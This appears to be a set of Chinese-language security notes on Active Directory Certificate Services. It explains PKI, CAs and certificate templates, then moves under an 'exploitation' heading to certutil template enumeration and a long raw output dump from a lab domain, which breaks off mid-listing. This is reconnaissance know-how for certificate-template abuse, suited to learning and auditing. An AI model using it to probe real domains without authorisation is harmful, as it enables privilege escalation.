:::info
- PKI - Public Key Infrastructure 管理证书和公钥加密的系统
- AD CS - Active Directory Certificate Services Microsoft 的 PKI 实现,通常在 DC 上运行
- CA - Certificate Authority PKI 的颁发机构
- Certificate Template - 一组设置和策略,用于定义 CA 如何生成和何时颁发证书
- CSR - Certificate Signing Request 发送给 CA 以请求签名证书
- EKU - Extended/Enhanced Key Usage 定义如何生成证书的对象标识符
:::
介绍
PKI
PKI 其实是一个术语表示: 公钥基本结构,用于实现证书的产生、管理、存储、分发和撤销等功能。
ADCS (AD 证书服务) 就是 PKI 的一个实现,ADCS能够跟现有的ADDS服务进行结合,可以用以加密文件系统,数字签名,以及身份验证
CA
证书颁发机构 (CA) 接受证书申请,根据 CA 的策略验证申请者的信息,然后使用其私钥将其数字签名应用于证书。然后 CA 将证书颁发给证书的使用者。此外,CA 还负责吊销证书和发布证书吊销列表 (CRL)。ADCS 中的 CA 分为 企业 CA 和 独立 CA,最主要的区别在于企业CA与ADDS服务结合,他的信息存储在ADDS数据库里面(就是LDAP上)。企业CA也支持基于证书模板和自动注册证书
:::tips
举个例子,我们有个有个域名daiker.com,如果要做https,我们就需要找证书颁发机构申请证书,比如说沃通CA。:::
我们也可以自己搭建一个证书颁发机构。


- 安装企业根CA时,它使用组策略将其证书传播到域中所有用户和计算机的“受信任的根证书颁发机构”证书存储
- 手动导入CA证书

以上图为例子,每个企业仅有一个根CA,他由自己颁发,在大多数组织中,它们只用于颁发从属 CA,不直接颁发证书。而具体的证书由从属CA颁发,比如网站的证书,LDAPS的证书,这样做方便管理,在机器比较多的域内还能起到负载均衡的作用。当然,AD CS支持分层的CA模型不代表一定要分层,对于比较小的公司,一般都只有一个根CA,所有的证书由这个根CA进行颁发。
证书请求与生成

- 客户端生成一个证书申请文件,这一步可以使用openssl生成
openssl req -new -SHA256 -newkey rsa:4096 -nodes -keyout www.netstarsec.com.key -out www.netstarsec.com.csr -subj "/C=CN/ST=Beijing/L=Beijing/O=netstarsec/OU=sec/CN=www.netstarsec.com"
- 客户端把证书申请文件发送给CA,然后选择一个证书模板

- CA证书会判断模板是否存在,根据模板的信息判断请求的用户是否有权限申请证书。证书模板会决定证书的主题名是什么,证书的有效时间是多久,证书用于干啥。是不是需要证书管理员批准。
- CA会使用自己的私钥来签署证书。签署完的证书可以在颁发列表里面看到
证书模板
证书模板是证书策略的重要元素,是用于证书注册、使用和管理的一组规则和格式。这些规则是指谁可以注册证书。证书的主题名是什么。比如要注册一个web证书,那可以在Web服务器这个默认的证书模板里面定义谁可以注册证书,证书的有效时间是多久,证书用于干啥,证书的主题名是什么,是由申请者提交,还是由证书模板指定。 我们可以使用<font style="color:rgb(18, 18, 18);background-color:rgb(246, 246, 246);">certtmlp.msc</font> 打开证书模板控制台

利用
证书模板枚举
我们可以使用 certutil进行枚举所有的模板并存储在文件中:
C;\> certutil -v -template > cert_templates.txt
Name: Active Directory Enrollment PolicyId: {163768E2-712B-4E97-A6A3-5E597F91D6F4}Url: ldap:35 Templates:Template[0]:TemplatePropCommonName = AdministratorTemplatePropFriendlyName = AdministratorTemplatePropEKUs =4 ObjectIds:1.3.6.1.4.1.311.10.3.1 Microsoft Trust List Signing1.3.6.1.4.1.311.10.3.4 Encrypting File System1.3.6.1.5.5.7.3.4 Secure Email1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.0TemplatePropMajorRevision = 4TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.7TemplatePropEnrollmentFlags = 29 (41)CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = a6000000 (-1509949440)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL -- 4000000 (67108864)CT_FLAG_SUBJECT_REQUIRE_EMAIL -- 20000000 (536870912)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 1023a (66106)CT_FLAG_ADD_EMAIL -- 2CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1cCertificate Template Name (Certificate Type)AdministratorExtension[1]:2.5.29.37: Flags = 0, Length = 2eEnhanced Key UsageMicrosoft Trust List Signing (1.3.6.1.4.1.311.10.3.1)Encrypting File System (1.3.6.1.4.1.311.10.3.4)Secure Email (1.3.6.1.5.5.7.3.4)Client Authentication (1.3.6.1.5.5.7.3.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[1]:TemplatePropCommonName = ClientAuthTemplatePropFriendlyName = Authenticated SessionTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.02: Microsoft Base DSS Cryptographic ProviderTemplatePropMajorRevision = 3TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.4TemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 82000000 (-2113929216)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10220 (66080)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain UsersAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 16Certificate Template Name (Certificate Type)ClientAuthExtension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[2]:TemplatePropCommonName = EFSTemplatePropFriendlyName = Basic EFSTemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.10.3.4 Encrypting File SystemTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.0TemplatePropMajorRevision = 3TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.6TemplatePropEnrollmentFlags = 29 (41)CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 82000000 (-2113929216)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10238 (66104)CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain UsersAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 8Certificate Template Name (Certificate Type)EFSExtension[1]:2.5.29.37: Flags = 0, Length = eEnhanced Key UsageEncrypting File System (1.3.6.1.4.1.311.10.3.4)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageKey Encipherment (20)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[3]:TemplatePropCommonName = CAExchangeTemplatePropFriendlyName = CA ExchangeTemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.21.5 Private Key ArchivalTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.0TemplatePropMajorRevision = 6a (106)TemplatePropDescription = ComputerTemplatePropSchemaVersion = 2TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.26 CA ExchangeTemplatePropV1ApplicationPolicy =1 ObjectIds:1.3.6.1.4.1.311.21.5 Private Key ArchivalTemplatePropEnrollmentFlags = 1CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10040 (65600)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=CA Exchange(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.26)Major Version Number=106Minor Version Number=0Extension[1]:2.5.29.37: Flags = 0, Length = dEnhanced Key UsagePrivate Key Archival (1.3.6.1.4.1.311.21.5)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageKey Encipherment (20)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = fApplication Policies[1]Application Certificate Policy:Policy Identifier=Private Key ArchivalTemplatePropValidityPeriod = 1 WeeksTemplatePropRenewalPeriod = 1 DaysTemplate[4]:TemplatePropCommonName = CEPEncryptionTemplatePropFriendlyName = CEP EncryptionTemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.20.2.1 Certificate Request AgentTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 4TemplatePropDescription = ComputerTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.22TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10241 (66113)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1cCertificate Template Name (Certificate Type)CEPEncryptionExtension[1]:2.5.29.37: Flags = 0, Length = eEnhanced Key UsageCertificate Request Agent (1.3.6.1.4.1.311.20.2.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageKey Encipherment (20)TemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[5]:TemplatePropCommonName = CodeSigningTemplatePropFriendlyName = Code SigningTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.3 Code SigningTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.02: Microsoft Base DSS Cryptographic ProviderTemplatePropMajorRevision = 3TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.9TemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 82000000 (-2113929216)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10220 (66080)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 18Certificate Template Name (Certificate Type)CodeSigningExtension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageCode Signing (1.3.6.1.5.5.7.3.3)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[6]:TemplatePropCommonName = MachineTemplatePropFriendlyName = ComputerTemplatePropEKUs =2 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.1 Server AuthenticationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 5TemplatePropDescription = ComputerTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.14TemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 18000000 (402653184)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10260 (66144)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DC)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain ComputersAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 10Certificate Template Name (Certificate Type)MachineExtension[1]:2.5.29.37: Flags = 0, Length = 16Enhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Server Authentication (1.3.6.1.5.5.7.3.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[7]:TemplatePropCommonName = CrossCATemplatePropFriendlyName = Cross Certification AuthorityTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.0TemplatePropMajorRevision = 69 (105)TemplatePropDescription = Cross-certified certification authorityTemplatePropSchemaVersion = 2TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 1TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.25 Cross Certification AuthorityTemplatePropRAEKUs =1 ObjectIds:1.3.6.1.4.1.311.10.3.10 Qualified SubordinationTemplatePropEnrollmentFlags = 8CT_FLAG_PUBLISH_TO_DS -- 8TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10810 (67600)CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_IS_CROSS_CA -- 800 (2048)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=Cross Certification Authority(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.25)Major Version Number=105Minor Version Number=0Extension[1]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing (86)Extension[2]:2.5.29.19: Flags = 1(Critical), Length = 5Basic ConstraintsSubject Type=CAPath Length Constraint=NoneTemplatePropValidityPeriod = 5 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[8]:TemplatePropCommonName = DirectoryEmailReplicationTemplatePropFriendlyName = Directory Email ReplicationTemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.21.19 Directory Service Email ReplicationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 73 (115)TemplatePropDescription = Directory e-mail replicationTemplatePropSchemaVersion = 2TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.29 Directory Email ReplicationTemplatePropSupersede =0: DomainControllerTemplatePropV1ApplicationPolicy =1 ObjectIds:1.3.6.1.4.1.311.21.19 Directory Service Email ReplicationTemplatePropEnrollmentFlags = 29 (41)CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 9000000 (150994944)CT_FLAG_SUBJECT_ALT_REQUIRE_DIRECTORY_GUID -- 1000000 (16777216)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10060 (65632)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;ED)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;ED)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Enterprise Read-only Domain ControllersAllow Auto-Enroll LUNAR\Enterprise Read-only Domain ControllersAllow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain ControllersAllow Enroll LUNAR\Enterprise AdminsAllow Auto-Enroll LUNAR\Domain ControllersAllow Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSAllow Auto-Enroll NT AUTHORITY\ENTERPRISE DOMAIN 